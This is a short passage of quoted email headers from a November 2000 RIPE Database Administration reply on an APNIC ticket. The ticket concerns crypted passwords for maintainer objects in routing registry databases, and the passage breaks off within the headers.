    RIPE> Nov 00 20:33:04 +1000 Received: from birch.ripe.net
    RIPE> (birch.ripe.net [193.0.1.96]) by ns.apnic.net (8.9.3/8.9.3)
    RIPE> with ESMTP id UAA122202 for <technical@apnic.net>; Wed, 29
    RIPE> Nov 2000 20:33:04 +1000 (EST) Received: from ripe.net
    RIPE> (office.ripe.net [193.0.1.97]) by birch.ripe.net
    RIPE> (8.8.8/8.8.8) with ESMTP id LAA24135; Wed, 29 Nov 2000
    RIPE> 11:31:26 +0100 (CET) Message-Id:
    RIPE> <200011291031.LAA24135@birch.ripe.net> To:
    RIPE> raju@linux-delhi.org cc: Bruce Campbell via RT
    RIPE> <technical@apnic.net>, gerald@merit.edu (Gerald Andrew
    RIPE> Winters), db-admin@radb.net, irrd-team@merit.edu Subject:
    RIPE> Re: [APNIC #62050] (technical) Crypted passwords for
    RIPE> maintainer objects In-reply-to: Your message of Mon, 27 Nov
    RIPE> 2000 13:17:01 +0530.
    RIPE> <14882.4469.52414.25633@localhost.localdomain> References:
    RIPE> <14882.4469.52414.25633@localhost.localdomain> From: RIPE
    RIPE> Database Administration <ripe-dbm@ripe.net> X-Organization:
    RIPE> RIPE Network Coordination 